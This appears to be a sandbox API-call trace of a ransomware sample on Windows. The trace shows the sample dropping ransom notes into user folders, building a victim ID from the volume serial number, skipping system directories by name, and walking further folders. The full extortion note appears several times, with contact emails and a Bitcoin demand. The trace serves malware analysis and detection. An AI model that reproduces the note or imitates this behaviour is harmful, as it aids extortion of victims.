	[0180.236] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0180.239] CloseHandle (hObject=0x380) returned 1
	[0180.239] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.239] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.240] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0180.241] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0180.241] CreateFileW (lpFileName="C:\\Users\\Default\\Saved Games\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\saved games\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.241] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0180.241] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0180.241] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0180.241] CloseHandle (hObject=0x380) returned 1
	[0180.242] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.242] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.242] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0180.242] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default\\Saved Games\\HELP_DECRYPT_YOUR_FILES.HTML") returned 57
	[0180.242] CreateFileW (lpFileName="C:\\Users\\Default\\Saved Games\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\saved games\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.243] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0180.243] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0180.245] CloseHandle (hObject=0x380) returned 1
	[0180.246] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.246] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.246] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.246] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0180.253] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.253] CreateFileW (lpFileName="C:\\Users\\Default\\Saved Games\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\saved games\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.253] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0180.253] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.253] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0180.254] CloseHandle (hObject=0x380) returned 1
	[0180.254] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Saved Games\\*.*" (normalized: "c:\\users\\default\\saved games\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x84f68332, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0180.255] lstrlenW (lpString="C:\\Users\\Default\\Saved Games\\*.*") returned 32
	[0180.255] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.255] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\Saved Games\\*.*", cchLength=0x20 | out: lpsz="c:\\users\\default\\saved games\\*.*") returned 0x20
	[0180.255] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.255] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="windows") returned 0x0
	[0180.255] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.255] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="boot") returned 0x0
	[0180.255] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.256] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="system volume information") returned 0x0
	[0180.256] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.256] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.256] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.256] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="temp") returned 0x0
	[0180.256] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.256] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="program files") returned 0x0
	[0180.256] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.257] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.257] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.257] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="appdata") returned 0x0
	[0180.257] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.257] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="application data") returned 0x0
	[0180.257] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.257] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="winnt") returned 0x0
	[0180.257] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.258] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="tmp") returned 0x0
	[0180.258] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.258] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="cache") returned 0x0
	[0180.258] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.258] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.258] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.258] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="webcache") returned 0x0
	[0180.258] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.259] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="inetcache") returned 0x0
	[0180.259] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.259] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="nvidia") returned 0x0
	[0180.259] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.259] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="packages") returned 0x0
	[0180.259] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.259] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="cookies") returned 0x0
	[0180.259] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.260] StrStrW (lpFirst="c:\\users\\default\\saved games\\*.*", lpSrch="programdata") returned 0x0
	[0180.260] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0180.260] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0180.260] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x84f68332, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.260] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0180.260] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f68332, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84f68332, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84f8e334, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0180.260] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f68332, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84f68332, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84f68332, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0180.260] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f68332, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84f68332, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84f68332, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0180.260] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0180.261] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0180.262] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1
	[0180.262] lstrcmpW (lpString1="SendTo", lpString2="..") returned 1
	[0180.262] lstrcmpW (lpString1="SendTo", lpString2=".") returned 1
	[0180.262] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default"
	[0180.262] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0180.262] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="SendTo" | out: lpString1="C:\\Users\\Default\\SendTo") returned="C:\\Users\\Default\\SendTo"
	[0180.262] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\SendTo" | out: lpString1="C:\\Users\\Default\\SendTo") returned="C:\\Users\\Default\\SendTo"
	[0180.262] lstrcatW (in: lpString1="C:\\Users\\Default\\SendTo", lpString2="\\" | out: lpString1="C:\\Users\\Default\\SendTo\\") returned="C:\\Users\\Default\\SendTo\\"
	[0180.262] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Default\\SendTo\\" | out: lpString1="C:\\Users\\Default\\SendTo\\") returned="C:\\Users\\Default\\SendTo\\"
	[0180.263] lstrcatW (in: lpString1="C:\\Users\\Default\\SendTo\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\SendTo\\*.*") returned="C:\\Users\\Default\\SendTo\\*.*"
	[0180.263] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\SendTo\\*.*" (normalized: "c:\\users\\default\\sendto\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f68332, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84f68332, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84f68332, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0xffffffff
	[0180.263] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0180.263] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\SendTo" | out: lpString1="C:\\Users\\Default\\SendTo") returned="C:\\Users\\Default\\SendTo"
	[0180.263] lstrcatW (in: lpString1="C:\\Users\\Default\\SendTo", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\SendTo\\*.*") returned="C:\\Users\\Default\\SendTo\\*.*"
	[0180.263] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.264] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.264] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default\\SendTo\\HELP_DECRYPT_YOUR_FILES.TXT") returned 51
	[0180.264] CreateFileW (lpFileName="C:\\Users\\Default\\SendTo\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\sendto\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.270] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0180.270] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0180.273] CloseHandle (hObject=0x380) returned 1
	[0180.273] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.273] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.274] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0180.275] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0180.275] CreateFileW (lpFileName="C:\\Users\\Default\\SendTo\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\sendto\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.275] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0180.275] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0180.275] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0180.275] CloseHandle (hObject=0x380) returned 1
	[0180.276] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.276] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.276] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0180.276] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default\\SendTo\\HELP_DECRYPT_YOUR_FILES.HTML") returned 52
	[0180.276] CreateFileW (lpFileName="C:\\Users\\Default\\SendTo\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\sendto\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.277] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0180.277] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0180.280] CloseHandle (hObject=0x380) returned 1
	[0180.280] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.281] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.281] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.281] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0180.283] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.283] CreateFileW (lpFileName="C:\\Users\\Default\\SendTo\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\sendto\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.283] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0180.283] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.284] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0180.284] CloseHandle (hObject=0x380) returned 1
	[0180.284] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\SendTo\\*.*" (normalized: "c:\\users\\default\\sendto\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f68332, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84f68332, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84f68332, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0xffffffff
	[0180.284] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0180.284] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1
	[0180.284] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1
	[0180.284] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1
